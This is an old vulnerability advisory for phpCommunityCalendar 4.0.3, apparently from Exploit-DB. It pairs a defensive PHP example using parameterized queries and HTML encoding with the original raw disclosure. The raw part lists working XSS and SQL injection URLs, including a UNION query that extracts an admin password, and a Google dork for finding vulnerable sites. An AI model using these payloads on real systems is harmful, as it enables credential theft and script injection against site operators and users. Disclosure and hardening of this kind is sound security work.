Vendor: phpCommunityCalendar
By: X0r_1
CVSS: 7.5 (HIGH)
CWE: 79, 89 (XSS and SQL Injections)
Product Name: phpCommunityCalendar
Affected Version From: 4.0.3
Affected Version To: 4.0.3
Patch Exists: NO
Related CWE: N/A
CPE: a:appideas:phpcommunitycalendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

phpCommunityCalendar 4.0.3 Multiple Vulnerabilities

phpCommunityCalendar 4.0.3 is vulnerable to cross-site scripting (XSS) and SQL injection. An attacker can inject script into the LoName parameter of week.php, month.php and event.php, and can inject SQL into the query parameter of month.php, day.php, event.php, delCalendar.php, delAdmin.php, delAddress.php and delCategory.php.

Mitigation:

Input validation should be used to prevent XSS and SQL Injections.
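The following is an added example, not code from the advisory or from phpCommunityCalendar, showing the hardened pattern the mitigation refers to: a request id is validated as an integer and bound as a value rather than spliced into the WHERE clause, and the name is HTML-encoded at output. The table name calendar_details, the function names, and the use of an in-memory SQLite database in place of the application's MySQL backend are assumptions for illustration; the column names CalendarDetailsID and LoName and the two hostile inputs are taken from the advisory.

```php
<?php
// Added example (not part of the advisory or of phpCommunityCalendar).
// Table name, function names and the SQLite backend are assumed for illustration.
declare(strict_types=1);

function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE calendar_details (CalendarDetailsID INTEGER PRIMARY KEY, LoName TEXT)');
    $db->exec("INSERT INTO calendar_details VALUES (1, 'Main calendar')");
    return $db;
}

// SQL: never accept a WHERE clause (or any SQL fragment) from the request.
// Accept only a positive integer id and bind it as a value, so the input can
// never be interpreted as SQL syntax.
function lookup_calendar(PDO $db, string $rawId): ?array {
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a plain id, including injection strings, is rejected
    }
    $stmt = $db->prepare(
        'SELECT CalendarDetailsID, LoName FROM calendar_details WHERE CalendarDetailsID = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// XSS: encode at the point of output, for the HTML element context the value lands in.
function render_name(string $name): string {
    return '<h1>' . htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</h1>';
}

$db = make_db();

// Constructed inputs: a benign id and the UNION payload quoted in the advisory.
$benign  = lookup_calendar($db, '1');
$hostile = lookup_calendar($db, "-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*");
assert($benign !== null && $benign['LoName'] === 'Main calendar');
assert($hostile === null);

// The advisory's script payload comes back as inert text once encoded.
$html = render_name("<script>alert('XSS')</script>");
assert(strpos($html, '<script>') === false);
echo $html, PHP_EOL;
```

Run with `php example.php`; the asserts pass silently and the encoded heading is printed. The key design choice is that the request never supplies SQL, only a value, so the `query=` style of parameter the advisory describes has no equivalent in the hardened code.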
Source

Exploit-DB raw data:

##################################################################################
#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<#
##################################################################################
#										 #
#	 phpCommunityCalendar 4.0.3 Multiple Vulnerabilities		        #
#										 #
##################################################################################
#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>#
##################################################################################
#										 #
#  author      : X0r_1   							 #
#  release     : 23.05.06							 #
#  software    : http://www.appideas.com/	  				 #
#  googledork  : "Calendar programming by AppIdeas.com" filetype:php   		 #
#										 #
##################################################################################

XSS:

http://[SERVER]/[PATH]/week.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/month.php?LoName=<script>alert('XSS')</script>

http://[SERVER]/[PATH]/event.php?AddressLink="><script>alert('XSS')</script><"


SQL Injections:

http://[SERVER]/[PATH]/month.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/day.php?query=CalendarDetailsID=-1) UNION SELECT Password,0 FROM phpcalendar_adminusers WHERE AdminUserID = 1/*

http://[SERVER]/[PATH]/event.php?ID=(1=1) [SQL]

http://[SERVER]/[PATH]/admin/delCalendar.php?CalendarDetailsID=x'[SQL]

http://[SERVER]/[PATH]/admin/delAdmin.php?AdminUserID=x' [SQL]

http://[SERVER]/[PATH]/admin/delAddress.php?EventLocationID=x' [SQL]

http://[SERVER]/[PATH]/admin/delCategory.php?LocationID=x' [SQL]

# milw0rm.com [2006-05-23]